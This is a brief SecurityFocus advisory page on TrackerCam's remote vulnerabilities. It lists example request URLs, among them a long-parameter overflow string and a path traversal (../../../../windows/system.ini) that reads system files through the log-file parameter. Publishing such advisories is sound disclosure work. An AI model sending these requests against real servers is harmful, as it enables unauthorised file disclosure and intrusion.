TrackerCam Multiple Remote Vulnerabilities

The following examples are available:

http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log

An exploit as well as a Metasploit exploit module are available:


 

Privacy Statement
Copyright 2010, SecurityFocus